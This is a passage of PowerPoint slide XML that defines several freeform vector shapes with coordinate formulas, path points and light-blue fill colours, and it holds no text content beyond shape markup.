                  <a:gd name="T8" fmla="*/ 1 w 14"/>
                  <a:gd name="T9" fmla="*/ 21 h 69"/>
                  <a:gd name="T10" fmla="*/ 0 w 14"/>
                  <a:gd name="T11" fmla="*/ 32 h 69"/>
                  <a:gd name="T12" fmla="*/ 0 w 14"/>
                  <a:gd name="T13" fmla="*/ 43 h 69"/>
                  <a:gd name="T14" fmla="*/ 1 w 14"/>
                  <a:gd name="T15" fmla="*/ 56 h 69"/>
                  <a:gd name="T16" fmla="*/ 3 w 14"/>
                  <a:gd name="T17" fmla="*/ 69 h 69"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 69 h 69"/>
                  <a:gd name="T20" fmla="*/ 13 w 14"/>
                  <a:gd name="T21" fmla="*/ 67 h 69"/>
                  <a:gd name="T22" fmla="*/ 13 w 14"/>
                  <a:gd name="T23" fmla="*/ 61 h 69"/>
                  <a:gd name="T24" fmla="*/ 12 w 14"/>
                  <a:gd name="T25" fmla="*/ 53 h 69"/>
                  <a:gd name="T26" fmla="*/ 10 w 14"/>
                  <a:gd name="T27" fmla="*/ 43 h 69"/>
                  <a:gd name="T28" fmla="*/ 9 w 14"/>
                  <a:gd name="T29" fmla="*/ 32 h 69"/>
                  <a:gd name="T30" fmla="*/ 9 w 14"/>
                  <a:gd name="T31" fmla="*/ 20 h 69"/>
                  <a:gd name="T32" fmla="*/ 12 w 14"/>
                  <a:gd name="T33" fmla="*/ 9 h 69"/>
                  <a:gd name="T34" fmla="*/ 14 w 14"/>
                  <a:gd name="T35" fmla="*/ 1 h 69"/>
                  <a:gd name="T36" fmla="*/ 14 w 14"/>
                  <a:gd name="T37" fmla="*/ 1 h 69"/>
                  <a:gd name="T38" fmla="*/ 14 w 14"/>
                  <a:gd name="T39" fmla="*/ 1 h 69"/>
                  <a:gd name="T40" fmla="*/ 14 w 14"/>
                  <a:gd name="T41" fmla="*/ 0 h 69"/>
                  <a:gd name="T42" fmla="*/ 14 w 14"/>
                  <a:gd name="T43" fmla="*/ 0 h 69"/>
                  <a:gd name="T44" fmla="*/ 13 w 14"/>
                  <a:gd name="T45" fmla="*/ 0 h 69"/>
                  <a:gd name="T46" fmla="*/ 10 w 14"/>
                  <a:gd name="T47" fmla="*/ 0 h 69"/>
                  <a:gd name="T48" fmla="*/ 8 w 14"/>
                  <a:gd name="T49" fmla="*/ 1 h 69"/>
                  <a:gd name="T50" fmla="*/ 5 w 14"/>
                  <a:gd name="T51" fmla="*/ 1 h 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
                  <a:gd name="T79" fmla="*/ 0 h 69"/>
                  <a:gd name="T80" fmla="*/ 14 w 14"/>
                  <a:gd name="T81" fmla="*/ 69 h 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 h="69">
                    <a:moveTo>
                      <a:pt x="5" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="72C6FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10786" name="Freeform 193"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1862" y="2334"/>
                <a:ext cx="12" cy="57"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 12"/>
                  <a:gd name="T1" fmla="*/ 1 h 57"/>
                  <a:gd name="T2" fmla="*/ 2 w 12"/>
                  <a:gd name="T3" fmla="*/ 2 h 57"/>
                  <a:gd name="T4" fmla="*/ 2 w 12"/>
                  <a:gd name="T5" fmla="*/ 5 h 57"/>
                  <a:gd name="T6" fmla="*/ 1 w 12"/>
                  <a:gd name="T7" fmla="*/ 10 h 57"/>
                  <a:gd name="T8" fmla="*/ 0 w 12"/>
                  <a:gd name="T9" fmla="*/ 17 h 57"/>
                  <a:gd name="T10" fmla="*/ 0 w 12"/>
                  <a:gd name="T11" fmla="*/ 26 h 57"/>
                  <a:gd name="T12" fmla="*/ 0 w 12"/>
                  <a:gd name="T13" fmla="*/ 35 h 57"/>
                  <a:gd name="T14" fmla="*/ 1 w 12"/>
                  <a:gd name="T15" fmla="*/ 45 h 57"/>
                  <a:gd name="T16" fmla="*/ 2 w 12"/>
                  <a:gd name="T17" fmla="*/ 57 h 57"/>
                  <a:gd name="T18" fmla="*/ 11 w 12"/>
                  <a:gd name="T19" fmla="*/ 56 h 57"/>
                  <a:gd name="T20" fmla="*/ 11 w 12"/>
                  <a:gd name="T21" fmla="*/ 55 h 57"/>
                  <a:gd name="T22" fmla="*/ 9 w 12"/>
                  <a:gd name="T23" fmla="*/ 50 h 57"/>
                  <a:gd name="T24" fmla="*/ 9 w 12"/>
                  <a:gd name="T25" fmla="*/ 43 h 57"/>
                  <a:gd name="T26" fmla="*/ 8 w 12"/>
                  <a:gd name="T27" fmla="*/ 35 h 57"/>
                  <a:gd name="T28" fmla="*/ 7 w 12"/>
                  <a:gd name="T29" fmla="*/ 26 h 57"/>
                  <a:gd name="T30" fmla="*/ 8 w 12"/>
                  <a:gd name="T31" fmla="*/ 16 h 57"/>
                  <a:gd name="T32" fmla="*/ 9 w 12"/>
                  <a:gd name="T33" fmla="*/ 8 h 57"/>
                  <a:gd name="T34" fmla="*/ 12 w 12"/>
                  <a:gd name="T35" fmla="*/ 0 h 57"/>
                  <a:gd name="T36" fmla="*/ 12 w 12"/>
                  <a:gd name="T37" fmla="*/ 0 h 57"/>
                  <a:gd name="T38" fmla="*/ 12 w 12"/>
                  <a:gd name="T39" fmla="*/ 0 h 57"/>
                  <a:gd name="T40" fmla="*/ 12 w 12"/>
                  <a:gd name="T41" fmla="*/ 0 h 57"/>
                  <a:gd name="T42" fmla="*/ 11 w 12"/>
                  <a:gd name="T43" fmla="*/ 0 h 57"/>
                  <a:gd name="T44" fmla="*/ 9 w 12"/>
                  <a:gd name="T45" fmla="*/ 0 h 57"/>
                  <a:gd name="T46" fmla="*/ 8 w 12"/>
                  <a:gd name="T47" fmla="*/ 0 h 57"/>
                  <a:gd name="T48" fmla="*/ 6 w 12"/>
                  <a:gd name="T49" fmla="*/ 0 h 57"/>
                  <a:gd name="T50" fmla="*/ 4 w 12"/>
                  <a:gd name="T51" fmla="*/ 1 h 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
                  <a:gd name="T79" fmla="*/ 0 h 57"/>
                  <a:gd name="T80" fmla="*/ 12 w 12"/>
                  <a:gd name="T81" fmla="*/ 57 h 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 h="57">
                    <a:moveTo>
                      <a:pt x="4" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="8CD8FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10787" name="Freeform 194"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1862" y="2339"/>
                <a:ext cx="9" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 9"/>
                  <a:gd name="T1" fmla="*/ 1 h 45"/>
                  <a:gd name="T2" fmla="*/ 2 w 9"/>
                  <a:gd name="T3" fmla="*/ 2 h 45"/>
                  <a:gd name="T4" fmla="*/ 2 w 9"/>
                  <a:gd name="T5" fmla="*/ 4 h 45"/>
                  <a:gd name="T6" fmla="*/ 1 w 9"/>
                  <a:gd name="T7" fmla="*/ 9 h 45"/>
                  <a:gd name="T8" fmla="*/ 1 w 9"/>
                  <a:gd name="T9" fmla="*/ 14 h 45"/>
                  <a:gd name="T10" fmla="*/ 0 w 9"/>
                  <a:gd name="T11" fmla="*/ 21 h 45"/>
                  <a:gd name="T12" fmla="*/ 0 w 9"/>
                  <a:gd name="T13" fmla="*/ 28 h 45"/>
                  <a:gd name="T14" fmla="*/ 1 w 9"/>
                  <a:gd name="T15" fmla="*/ 37 h 45"/>
                  <a:gd name="T16" fmla="*/ 2 w 9"/>
                  <a:gd name="T17" fmla="*/ 45 h 45"/>
                  <a:gd name="T18" fmla="*/ 9 w 9"/>
                  <a:gd name="T19" fmla="*/ 45 h 45"/>
                  <a:gd name="T20" fmla="*/ 9 w 9"/>
                  <a:gd name="T21" fmla="*/ 44 h 45"/>
                  <a:gd name="T22" fmla="*/ 8 w 9"/>
                  <a:gd name="T23" fmla="*/ 40 h 45"/>
                  <a:gd name="T24" fmla="*/ 7 w 9"/>
                  <a:gd name="T25" fmla="*/ 35 h 45"/>
                  <a:gd name="T26" fmla="*/ 7 w 9"/>
                  <a:gd name="T27" fmla="*/ 28 h 45"/>
                  <a:gd name="T28" fmla="*/ 6 w 9"/>
                  <a:gd name="T29" fmla="*/ 21 h 45"/>
                  <a:gd name="T30" fmla="*/ 7 w 9"/>
                  <a:gd name="T31" fmla="*/ 14 h 45"/>
                  <a:gd name="T32" fmla="*/ 7 w 9"/>
                  <a:gd name="T33" fmla="*/ 7 h 45"/>
                  <a:gd name="T34" fmla="*/ 9 w 9"/>
                  <a:gd name="T35" fmla="*/ 1 h 45"/>
                  <a:gd name="T36" fmla="*/ 9 w 9"/>
                  <a:gd name="T37" fmla="*/ 1 h 45"/>
                  <a:gd name="T38" fmla="*/ 9 w 9"/>
                  <a:gd name="T39" fmla="*/ 1 h 45"/>
                  <a:gd name="T40" fmla="*/ 9 w 9"/>
                  <a:gd name="T41" fmla="*/ 1 h 45"/>
                  <a:gd name="T42" fmla="*/ 9 w 9"/>
                  <a:gd name="T43" fmla="*/ 0 h 45"/>
                  <a:gd name="T44" fmla="*/ 8 w 9"/>
                  <a:gd name="T45" fmla="*/ 0 h 45"/>
                  <a:gd name="T46" fmla="*/ 7 w 9"/>
                  <a:gd name="T47" fmla="*/ 1 h 45"/>
                  <a:gd name="T48" fmla="*/ 6 w 9"/>
                  <a:gd name="T49" fmla="*/ 1 h 45"/>
                  <a:gd name="T50" fmla="*/ 4 w 9"/>
                  <a:gd name="T51" fmla="*/ 1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
                  <a:gd name="T79" fmla="*/ 0 h 45"/>
                  <a:gd name="T80" fmla="*/ 9 w 9"/>
                  <a:gd name="T81" fmla="*/ 45 h 4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 h="45">
                    <a:moveTo>
                      <a:pt x="4" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A5EDFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10788" name="Freeform 195"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1863" y="2344"/>
                <a:ext cx="7" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 7"/>
                  <a:gd name="T1" fmla="*/ 2 h 34"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 2 h 34"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 4 h 34"/>
                  <a:gd name="T6" fmla="*/ 0 w 7"/>
                  <a:gd name="T7" fmla="*/ 6 h 34"/>
                  <a:gd name="T8" fmla="*/ 0 w 7"/>
                  <a:gd name="T9" fmla="*/ 11 h 34"/>
                  <a:gd name="T10" fmla="*/ 0 w 7"/>
                  <a:gd name="T11" fmla="*/ 16 h 34"/>
                  <a:gd name="T12" fmla="*/ 0 w 7"/>
                  <a:gd name="T13" fmla="*/ 21 h 34"/>
                  <a:gd name="T14" fmla="*/ 0 w 7"/>
                  <a:gd name="T15" fmla="*/ 27 h 34"/>
                  <a:gd name="T16" fmla="*/ 1 w 7"/>
                  <a:gd name="T17" fmla="*/ 34 h 34"/>
                  <a:gd name="T18" fmla="*/ 6 w 7"/>
                  <a:gd name="T19" fmla="*/ 34 h 34"/>
                  <a:gd name="T20" fmla="*/ 6 w 7"/>
                  <a:gd name="T21" fmla="*/ 33 h 34"/>
                  <a:gd name="T22" fmla="*/ 6 w 7"/>
                  <a:gd name="T23" fmla="*/ 30 h 34"/>
                  <a:gd name="T24" fmla="*/ 5 w 7"/>
                  <a:gd name="T25" fmla="*/ 26 h 34"/>
                  <a:gd name="T26" fmla="*/ 5 w 7"/>
                  <a:gd name="T27" fmla="*/ 21 h 34"/>
                  <a:gd name="T28" fmla="*/ 5 w 7"/>
                  <a:gd name="T29" fmla="*/ 16 h 34"/>
                  <a:gd name="T30" fmla="*/ 5 w 7"/>
                  <a:gd name="T31" fmla="*/ 11 h 34"/>
                  <a:gd name="T32" fmla="*/ 5 w 7"/>
                  <a:gd name="T33" fmla="*/ 5 h 34"/>
                  <a:gd name="T34" fmla="*/ 7 w 7"/>
                  <a:gd name="T35" fmla="*/ 2 h 34"/>
                  <a:gd name="T36" fmla="*/ 7 w 7"/>
                  <a:gd name="T37" fmla="*/ 2 h 34"/>
                  <a:gd name="T38" fmla="*/ 7 w 7"/>
                  <a:gd name="T39" fmla="*/ 0 h 34"/>
                  <a:gd name="T40" fmla="*/ 6 w 7"/>
                  <a:gd name="T41" fmla="*/ 0 h 34"/>
                  <a:gd name="T42" fmla="*/ 6 w 7"/>
                  <a:gd name="T43" fmla="*/ 0 h 34"/>
                  <a:gd name="T44" fmla="*/ 6 w 7"/>
                  <a:gd name="T45" fmla="*/ 0 h 34"/>
                  <a:gd name="T46" fmla="*/ 5 w 7"/>
                  <a:gd name="T47" fmla="*/ 0 h 34"/>
                  <a:gd name="T48" fmla="*/ 4 w 7"/>
                  <a:gd name="T49" fmla="*/ 0 h 34"/>
                  <a:gd name="T50" fmla="*/ 3 w 7"/>
                  <a:gd name="T51" fmla="*/ 2 h 3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34"/>
                  <a:gd name="T80" fmla="*/ 7 w 7"/>
                  <a:gd name="T81" fmla="*/ 34 h 3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34">
                    <a:moveTo>
                      <a:pt x="3" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10789" name="Freeform 196"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1959" y="2312"/>
                <a:ext cx="23" cy="91"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 23"/>
                  <a:gd name="T1" fmla="*/ 1 h 91"/>
                  <a:gd name="T2" fmla="*/ 22 w 23"/>
                  <a:gd name="T3" fmla="*/ 1 h 91"/>
                  <a:gd name="T4" fmla="*/ 21 w 23"/>
                  <a:gd name="T5" fmla="*/ 3 h 91"/>
                  <a:gd name="T6" fmla="*/ 19 w 23"/>
                  <a:gd name="T7" fmla="*/ 8 h 91"/>
                  <a:gd name="T8" fmla="*/ 16 w 23"/>
                  <a:gd name="T9" fmla="*/ 16 h 91"/>
                  <a:gd name="T10" fmla="*/ 15 w 23"/>
                  <a:gd name="T11" fmla="*/ 28 h 91"/>
                  <a:gd name="T12" fmla="*/ 14 w 23"/>
                  <a:gd name="T13" fmla="*/ 43 h 91"/>
                  <a:gd name="T14" fmla="*/ 15 w 23"/>
                  <a:gd name="T15" fmla="*/ 64 h 91"/>
                  <a:gd name="T16" fmla="*/ 17 w 23"/>
                  <a:gd name="T17" fmla="*/ 91 h 91"/>
                  <a:gd name="T18" fmla="*/ 5 w 23"/>
                  <a:gd name="T19" fmla="*/ 91 h 91"/>
                  <a:gd name="T20" fmla="*/ 3 w 23"/>
                  <a:gd name="T21" fmla="*/ 87 h 91"/>
                  <a:gd name="T22" fmla="*/ 2 w 23"/>
                  <a:gd name="T23" fmla="*/ 80 h 91"/>
                  <a:gd name="T24" fmla="*/ 1 w 23"/>
                  <a:gd name="T25" fmla="*/ 70 h 91"/>
                  <a:gd name="T26" fmla="*/ 0 w 23"/>
                  <a:gd name="T27" fmla="*/ 56 h 91"/>
                  <a:gd name="T28" fmla="*/ 0 w 23"/>
                  <a:gd name="T29" fmla="*/ 42 h 91"/>
                  <a:gd name="T30" fmla="*/ 1 w 23"/>
                  <a:gd name="T31" fmla="*/ 27 h 91"/>
                  <a:gd name="T32" fmla="*/ 3 w 23"/>
                  <a:gd name="T33" fmla="*/ 12 h 91"/>
                  <a:gd name="T34" fmla="*/ 7 w 23"/>
                  <a:gd name="T35" fmla="*/ 0 h 91"/>
                  <a:gd name="T36" fmla="*/ 23 w 23"/>
                  <a:gd name="T37" fmla="*/ 1 h 9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
                  <a:gd name="T58" fmla="*/ 0 h 91"/>
                  <a:gd name="T59" fmla="*/ 23 w 23"/>
                  <a:gd name="T60" fmla="*/ 91 h 9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 h="91">
                    <a:moveTo>
                      <a:pt x="23" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="59B2FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10790" name="Freeform 197"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1960" y="2319"/>
                <a:ext cx="19" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 19"/>
                  <a:gd name="T1" fmla="*/ 0 h 77"/>
                  <a:gd name="T2" fmla="*/ 19 w 19"/>
                  <a:gd name="T3" fmla="*/ 1 h 77"/>
                  <a:gd name="T4" fmla="*/ 18 w 19"/>
                  <a:gd name="T5" fmla="*/ 2 h 77"/>
                  <a:gd name="T6" fmla="*/ 16 w 19"/>
                  <a:gd name="T7" fmla="*/ 7 h 77"/>
                  <a:gd name="T8" fmla="*/ 14 w 19"/>
                  <a:gd name="T9" fmla="*/ 12 h 77"/>
                  <a:gd name="T10" fmla="*/ 13 w 19"/>
                  <a:gd name="T11" fmla="*/ 23 h 77"/>
                  <a:gd name="T12" fmla="*/ 12 w 19"/>
                  <a:gd name="T13" fmla="*/ 36 h 77"/>
                  <a:gd name="T14" fmla="*/ 13 w 19"/>
                  <a:gd name="T15" fmla="*/ 53 h 77"/>
                  <a:gd name="T16" fmla="*/ 14 w 19"/>
                  <a:gd name="T17" fmla="*/ 77 h 77"/>
                  <a:gd name="T18" fmla="*/ 4 w 19"/>
                  <a:gd name="T19" fmla="*/ 77 h 77"/>
                  <a:gd name="T20" fmla="*/ 4 w 19"/>
                  <a:gd name="T21" fmla="*/ 74 h 77"/>
                  <a:gd name="T22" fmla="*/ 2 w 19"/>
                  <a:gd name="T23" fmla="*/ 69 h 77"/>
                  <a:gd name="T24" fmla="*/ 1 w 19"/>
                  <a:gd name="T25" fmla="*/ 59 h 77"/>
                  <a:gd name="T26" fmla="*/ 0 w 19"/>
                  <a:gd name="T27" fmla="*/ 48 h 77"/>
                  <a:gd name="T28" fmla="*/ 0 w 19"/>
                  <a:gd name="T29" fmla="*/ 35 h 77"/>
                  <a:gd name="T30" fmla="*/ 0 w 19"/>
                  <a:gd name="T31" fmla="*/ 22 h 77"/>
                  <a:gd name="T32" fmla="*/ 2 w 19"/>
                  <a:gd name="T33" fmla="*/ 10 h 77"/>
                  <a:gd name="T34" fmla="*/ 6 w 19"/>
                  <a:gd name="T35" fmla="*/ 0 h 77"/>
